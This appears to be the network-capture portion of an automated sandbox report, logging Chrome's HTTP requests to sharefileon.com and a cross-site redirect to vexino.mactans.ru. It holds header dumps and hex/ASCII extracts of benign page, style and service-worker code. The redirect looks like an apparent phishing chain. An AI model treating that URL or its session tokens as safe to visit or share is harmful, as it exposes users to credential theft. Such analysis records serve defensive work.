                                                                                                                                                                                                                          2024-12-17 17:20:40 UTC15292INData Raw: 63 31 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 69 73 74 65 61 6d 2f 69 70 2f 66 39 38 37 65 65 32 38 2d 30 64 32 64 2d 34 64 34 39 2d 62 62 31 31 2d 38 33 34 63 31 39 39 35 66 38 62 33 2f 66 61 76 69 63 6f 6e 2f 39 30 39 63 31 62 34 64 2d 63 39 37 62 2d 34 39 31 34 2d 62 37 65 30 2d 66 33 39 62 61 38 30 32 63 30 35 34 2f 62 37 37 33 62 31 64 62 2d 65 39 36 34 2d 34 64 64 36 2d 38 66 65 64 2d 34 35 66 62 66 64 37 33 66 66 63 35 2e 70 6e 67 2f 3a 2f 72 73 3d 77 3a 31 36 2c 68 3a 31 36 2c 6d 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69
                                                                                                                                                                                                                          Data Ascii: c134<!DOCTYPE html><html lang="en-US"><head><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:16,h:16,m" sizes="16x16"/><li
                                                                                                                                                                                                                          2024-12-17 17:20:40 UTC16384INData Raw: 64 74 68 3a 69 6e 68 65 72 69 74 7d 2e 78 20 2e 63 31 2d 34 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 78 20 2e 63 31 2d 34 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 78 20 2e 63 31 2d 34 75 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 37 7d 2e 78 20 2e 63 31 2d 34 76 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 7d 2e 78 20 2e 63 31 2d 34 77 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 78 20 2e 63 31 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 7d 2e 78 20 2e 63 31 2d 34 79 7b 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 7d 2e 78 20 2e 63 31 2d 34 7a 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 78 20 2e 63 31 2d 35 34 7b 77 6f 72 64 2d 77 72 61 70 3a 6e
                                                                                                                                                                                                                          Data Ascii: dth:inherit}.x .c1-4s{display:block}.x .c1-4t{line-height:1.2}.x .c1-4u{line-height:1.27}.x .c1-4v{margin-bottom:8px}.x .c1-4w{white-space:pre-line}.x .c1-4x{font-size:32px}.x .c1-4y{color:rgb(255, 255, 255)}.x .c1-4z{font-weight:400}.x .c1-54{word-wrap:n
                                                                                                                                                                                                                          2024-12-17 17:20:40 UTC16384INData Raw: 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 32 67 20 63 31 2d 32 68 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 64 20 63 31 2d 65 20 63 31 2d 66 20 63 31 2d 67 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 64 61 74 61 2d 75 78 3d 22 42 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 32 69 20 63 31 2d 32 65 20 63 31 2d 32 68 20 63 31 2d 74 20 63 31 2d 32 66 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 64 20 63 31 2d 65 20 63 31 2d 66 20 63 31 2d 67 22 3e 3c 64 69 76 20 64 61 74 61 2d 75 78 3d 22 42 6c 6f 63 6b 22 20 64 61 74 61 2d 61 69 64 3d 22 48 45 41 44 45 52 5f 4c 4f 47 4f 5f 52 45 4e 44 45 52 45 44 22 20 63 6c 61 73 73 3d 22 78 2d 65
                                                                                                                                                                                                                          Data Ascii: class="x-el x-el-div c1-1 c1-2 c1-2g c1-2h c1-b c1-c c1-d c1-e c1-f c1-g"></div><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-2i c1-2e c1-2h c1-t c1-2f c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-e
                                                                                                                                                                                                                          2024-12-17 17:20:40 UTC1413INData Raw: 2c 22 77 61 6d 5f 73 69 74 65 5f 62 75 73 69 6e 65 73 73 43 61 74 65 67 6f 72 79 22 3a 22 69 74 73 65 72 76 69 63 65 73 22 2c 22 77 61 6d 5f 73 69 74 65 5f 74 68 65 6d 65 22 3a 22 6c 61 79 6f 75 74 31 34 22 2c 22 77 61 6d 5f 73 69 74 65 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 77 61 6d 5f 73 69 74 65 5f 66 6f 6e 74 50 61 63 6b 22 3a 22 6d 75 6c 69 22 2c 22 77 61 6d 5f 73 69 74 65 5f 63 6f 6f 6b 69 65 42 61 6e 6e 65 72 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 77 61 6d 5f 73 69 74 65 5f 6d 65 6d 62 65 72 73 68 69 70 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 77 61 6d 5f 73 69 74 65 5f 68 61 73 48 6f 6d 65 70 61 67 65 48 54 4d 4c 22 3a 66 61 6c 73 65 2c 22 77 61 6d 5f 73 69 74 65 5f 68 61 73 48 6f 6d 65 70 61 67 65 53 68 6f 70 22 3a 66 61
                                                                                                                                                                                                                          Data Ascii: ,"wam_site_businessCategory":"itservices","wam_site_theme":"layout14","wam_site_locale":"en-US","wam_site_fontPack":"muli","wam_site_cookieBannerEnabled":true,"wam_site_membershipEnabled":true,"wam_site_hasHomepageHTML":false,"wam_site_hasHomepageShop":fa


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          1192.168.2.184972213.248.243.5443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:20:45 UTC551OUTGET /markup/ad HTTP/1.1
                                                                                                                                                                                                                          Host: sharefileon.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Referer: https://sharefileon.com/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          Cookie: dps_site_id=us-east-1
                                                                                                                                                                                                                          2024-12-17 17:20:46 UTC1059INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Link: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.47.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/muli/v29/7Aulp_0qiz-aVz7u3PJLcUMYOFnOkEk30eg.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hK1QN.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossorigin
                                                                                                                                                                                                                          Cache-Control: max-age=30
                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Server: DPS/2.0.0+sha-8f288ca
                                                                                                                                                                                                                          X-Version: 8f288ca
                                                                                                                                                                                                                          X-SiteId: us-east-1
                                                                                                                                                                                                                          Set-Cookie: dps_site_id=us-east-1; path=/; secure
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:20:45 GMT
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2024-12-17 17:20:46 UTC15325INData Raw: 39 36 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 69 73 74 65 61 6d 2f 69 70 2f 66 39 38 37 65 65 32 38 2d 30 64 32 64 2d 34 64 34 39 2d 62 62 31 31 2d 38 33 34 63 31 39 39 35 66 38 62 33 2f 66 61 76 69 63 6f 6e 2f 39 30 39 63 31 62 34 64 2d 63 39 37 62 2d 34 39 31 34 2d 62 37 65 30 2d 66 33 39 62 61 38 30 32 63 30 35 34 2f 62 37 37 33 62 31 64 62 2d 65 39 36 34 2d 34 64 64 36 2d 38 66 65 64 2d 34 35 66 62 66 64 37 33 66 66 63 35 2e 70 6e 67 2f 3a 2f 72 73 3d 77 3a 31 36 2c 68 3a 31 36 2c 6d 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69
                                                                                                                                                                                                                          Data Ascii: 9604<!DOCTYPE html><html lang="en-US"><head><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:16,h:16,m" sizes="16x16"/><li
                                                                                                                                                                                                                          2024-12-17 17:20:46 UTC16384INData Raw: 32 70 78 7d 2e 78 20 2e 63 31 2d 34 65 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 78 20 2e 63 31 2d 34 66 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 7d 2e 78 20 2e 63 31 2d 34 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 78 20 2e 63 31 2d 34 68 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 30 70 78 7d 2e 78 20 2e 63 31 2d 34 69 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 30 70 78 7d 2e 78 20 2e 63 31 2d 34 6a 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 7d 2e 78 20 2e 63 31 2d 34 6b 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 70 78 7d 2e 78 20 2e 63 31 2d 34 6c 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 35 36 70 78 7d 2e 78 20 2e 63 31 2d 34 6d 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 38 70
                                                                                                                                                                                                                          Data Ascii: 2px}.x .c1-4e{border-style:none}.x .c1-4f{display:inline-flex}.x .c1-4g{position:relative}.x .c1-4h{padding-left:40px}.x .c1-4i{padding-right:40px}.x .c1-4j{padding-top:8px}.x .c1-4k{padding-bottom:8px}.x .c1-4l{min-height:56px}.x .c1-4m{border-radius:48p
                                                                                                                                                                                                                          2024-12-17 17:20:46 UTC6708INData Raw: 44 45 52 45 44 22 20 69 64 3d 22 38 32 30 39 35 63 30 39 2d 30 62 63 32 2d 34 38 37 62 2d 38 34 35 62 2d 39 61 39 32 34 38 64 62 63 61 30 39 2d 62 61 6e 6e 65 72 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 35 67 20 63 31 2d 35 68 20 63 31 2d 35 69 20 63 31 2d 34 20 63 31 2d 33 77 20 63 31 2d 32 79 20 63 31 2d 35 6a 20 63 31 2d 32 62 20 63 31 2d 35 6b 20 63 31 2d 35 6c 20 63 31 2d 35 6d 20 63 31 2d 35 6e 20 63 31 2d 35 6f 20 63 31 2d 35 70 20 63 31 2d 71 20 63 31 2d 35 71 20 63 31 2d 70 20 63 31 2d 32 33 20 63 31 2d 33 36 20 63 31 2d 32 34 20 63 31 2d 33 37 20 63 31 2d 32 31 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 35 72 20 63 31 2d 35 73 20 63 31 2d 35 74 20 63 31 2d 35 75 20 63 31 2d 35 76
                                                                                                                                                                                                                          Data Ascii: DERED" id="82095c09-0bc2-487b-845b-9a9248dbca09-banner" class="x-el x-el-div c1-1 c1-2 c1-5g c1-5h c1-5i c1-4 c1-3w c1-2y c1-5j c1-2b c1-5k c1-5l c1-5m c1-5n c1-5o c1-5p c1-q c1-5q c1-p c1-23 c1-36 c1-24 c1-37 c1-21 c1-b c1-c c1-5r c1-5s c1-5t c1-5u c1-5v


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.184976113.248.243.5443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:20:55 UTC541OUTGET /sw.js HTTP/1.1
                                                                                                                                                                                                                          Host: sharefileon.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Service-Worker: script
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Dest: serviceworker
                                                                                                                                                                                                                          Referer: https://sharefileon.com/
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          Cookie: dps_site_id=us-east-1; cookie_warning_dismissed=true; cookie_terms_accepted=true
                                                                                                                                                                                                                          2024-12-17 17:20:55 UTC736INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Link: <https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossorigin
                                                                                                                                                                                                                          Cache-Control: max-age=30
                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Server: DPS/2.0.0+sha-8f288ca
                                                                                                                                                                                                                          X-Version: 8f288ca
                                                                                                                                                                                                                          X-SiteId: us-east-1
                                                                                                                                                                                                                          Set-Cookie: dps_site_id=us-east-1; path=/; secure
                                                                                                                                                                                                                          ETag: 772487766993e995f7e3e136d25b9017
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:20:55 GMT
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2024-12-17 17:20:55 UTC15648INData Raw: 38 30 36 65 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 38 39 35 3a 28 29 3d 3e 7b 74 72 79 7b 73 65 6c 66 5b 22 77 6f 72 6b 62 6f 78 3a 63 61 63 68 65 61 62 6c 65 2d 72 65 73 70 6f 6e 73 65 3a 36 2e 34 2e 31 22 5d 26 26 5f 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 2c 32 35 39 3a 28 65 2c 74 2c 73 29 3d 3e 7b 73 2e 64 28 74 2c 7b 42 3a 28 29 3d 3e 61 7d 29 2c 73 28 39 31 33 29 3b 63 6c 61 73 73 20 61 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 70 72 6f 6d 69 73 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 28 65 2c 74 29 3d 3e 7b 74 68 69 73 2e 72 65 73 6f 6c 76 65 3d 65 2c 74 68 69 73 2e 72 65 6a 65 63 74 3d 74 7d 29 29 7d 7d 7d 2c 31 32 35 3a 28 65 2c 74 2c 73 29 3d 3e 7b 73 2e 64 28 74 2c 7b 56 3a
                                                                                                                                                                                                                          Data Ascii: 806e(()=>{"use strict";var e={895:()=>{try{self["workbox:cacheable-response:6.4.1"]&&_()}catch(e){}},259:(e,t,s)=>{s.d(t,{B:()=>a}),s(913);class a{constructor(){this.promise=new Promise(((e,t)=>{this.resolve=e,this.reject=t}))}}},125:(e,t,s)=>{s.d(t,{V:
                                                                                                                                                                                                                          2024-12-17 17:20:56 UTC16384INData Raw: 2c 72 29 2c 72 7d 76 61 72 20 52 3b 52 3d 64 2c 64 3d 7b 2e 2e 2e 52 2c 67 65 74 3a 28 65 2c 74 2c 73 29 3d 3e 5f 28 65 2c 74 29 7c 7c 52 2e 67 65 74 28 65 2c 74 2c 73 29 2c 68 61 73 3a 28 65 2c 74 29 3d 3e 21 21 5f 28 65 2c 74 29 7c 7c 52 2e 68 61 73 28 65 2c 74 29 7d 2c 73 28 35 35 30 29 3b 63 6f 6e 73 74 20 76 3d 22 63 61 63 68 65 2d 65 6e 74 72 69 65 73 22 2c 62 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 6e 65 77 20 55 52 4c 28 65 2c 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 72 65 74 75 72 6e 20 74 2e 68 61 73 68 3d 22 22 2c 74 2e 68 72 65 66 7d 3b 63 6c 61 73 73 20 78 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 5f 64 62 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 63 61 63 68 65 4e 61 6d 65 3d 65 7d 5f 75 70 67 72 61 64 65 44 62 28 65 29 7b
                                                                                                                                                                                                                          Data Ascii: ,r),r}var R;R=d,d={...R,get:(e,t,s)=>_(e,t)||R.get(e,t,s),has:(e,t)=>!!_(e,t)||R.has(e,t)},s(550);const v="cache-entries",b=e=>{const t=new URL(e,location.href);return t.hash="",t.href};class x{constructor(e){this._db=null,this._cacheName=e}_upgradeDb(e){
                                                                                                                                                                                                                          2024-12-17 17:20:56 UTC859INData Raw: 71 75 65 73 74 3a 65 7d 29 3d 3e 22 73 74 79 6c 65 22 3d 3d 3d 65 2e 64 65 73 74 69 6e 61 74 69 6f 6e 7c 7c 22 73 63 72 69 70 74 22 3d 3d 3d 65 2e 64 65 73 74 69 6e 61 74 69 6f 6e 29 2c 6e 65 77 20 74 2e 53 74 61 6c 65 57 68 69 6c 65 52 65 76 61 6c 69 64 61 74 65 28 7b 63 61 63 68 65 4e 61 6d 65 3a 22 73 74 61 74 69 63 2d 72 65 73 6f 75 72 63 65 73 22 2c 70 6c 75 67 69 6e 73 3a 5b 6e 65 77 20 61 2e 43 61 63 68 65 61 62 6c 65 52 65 73 70 6f 6e 73 65 50 6c 75 67 69 6e 28 7b 73 74 61 74 75 73 65 73 3a 5b 32 30 30 5d 7d 29 5d 7d 29 29 2c 28 30 2c 65 2e 72 65 67 69 73 74 65 72 52 6f 75 74 65 29 28 28 28 7b 75 72 6c 3a 65 7d 29 3d 3e 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3d 3d 3d 65 2e 6f 72 69 67 69 6e 29 2c
                                                                                                                                                                                                                          Data Ascii: quest:e})=>"style"===e.destination||"script"===e.destination),new t.StaleWhileRevalidate({cacheName:"static-resources",plugins:[new a.CacheableResponsePlugin({statuses:[200]})]})),(0,e.registerRoute)((({url:e})=>"https://fonts.googleapis.com"===e.origin),


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.184977513.248.243.5443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:20:56 UTC534OUTGET /manifest.webmanifest HTTP/1.1
                                                                                                                                                                                                                          Host: sharefileon.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                          Referer: https://sharefileon.com/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC739INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Link: <https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossorigin
                                                                                                                                                                                                                          Cache-Control: max-age=30
                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.com
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                          Content-Type: application/manifest+json
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Server: DPS/2.0.0+sha-8f288ca
                                                                                                                                                                                                                          X-Version: 8f288ca
                                                                                                                                                                                                                          X-SiteId: us-east-1
                                                                                                                                                                                                                          Set-Cookie: dps_site_id=us-east-1; path=/; secure
                                                                                                                                                                                                                          ETag: 8b1cfd39d9c27229bd688e27eee2e76b
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:20:57 GMT
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC491INData Raw: 31 64 66 0d 0a 7b 22 73 63 6f 70 65 22 3a 22 2f 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 2f 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 22 69 63 6f 6e 73 22 3a 5b 7b 22 73 69 7a 65 73 22 3a 22 31 39 32 78 31 39 32 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 73 72 63 22 3a 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 69 73 74 65 61 6d 2f 69 70 2f 66 39 38 37 65 65 32 38 2d 30 64 32 64 2d 34 64 34 39 2d 62 62 31 31 2d 38 33 34 63 31 39 39 35 66 38 62 33 2f 62 6c 6f 62 2d 39 32 66 30 65 62 34 2e 70 6e 67 2f 3a 2f 72 73 3d 77 3a 31 39 32 2c 68 3a 31 39 32 2c 6d 22 7d 2c 7b 22 73 69 7a 65 73 22 3a 22 35 31 32 78 35 31 32 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 73 72 63
                                                                                                                                                                                                                          Data Ascii: 1df{"scope":"/","start_url":"/","display":"standalone","icons":[{"sizes":"192x192","type":"image/png","src":"//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-92f0eb4.png/:/rs=w:192,h:192,m"},{"sizes":"512x512","type":"image/png","src


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.1849777172.67.208.33443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC709OUTGET /21EzuOJ/ HTTP/1.1
                                                                                                                                                                                                                          Host: vexino.mactans.ru
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                          Referer: https://sharefileon.com/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:20:57 UTC1237INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:20:57 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Cache-Control: no-cache, private
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgVLD3huff1XUSXj7rjSJCxZDuJriboTFwmXLaCOSIFQWsUCQF6zm1iFnTt6uENyqXICwahjMn9BXivKUJvXJI9f3Un9qlEdW%2BFUwYYbb8MuXTRfpKkR3rRAXT9w7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1032&min_rtt=983&rtt_var=403&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1612&delivery_rate=2897253&cwnd=251&unsent_bytes=0&cid=a173eafe58ffd2ac&ts=248&x=0"
                                                                                                                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6ImFlK2l1UXhEd2dqWStTdGs4Z1IxclE9PSIsInZhbHVlIjoiSFZOamFVbTRMZVV6bTBSUG00Qi9lV1FWZkFGN00yc3ExaHRxd2xvbWJiU3NUWDh6aXl0Skc5WURnK2owWnYwcmkyaWJnZmd3VkdEN0pmdktKbms1UEJrSWVoR2orVWgyYTVFM0RaT2VXd3FtNU5GZ1BodVZSNFd0d2NjM01QTk8iLCJtYWMiOiI5N2U5YmQ4NWFjZDA1NTdmMzM3ZjFhYmFmNGQ4MzkxNDZiZDhjZmQwNDE1YmRmNTRjZDFjNmMyMTIzM2U3OTE0IiwidGFnIjoiIn0%3D; expires=Tue, 17-Dec-2024 19:20:57 GMT; Max-Age=7200; path=/; secure; samesite=none
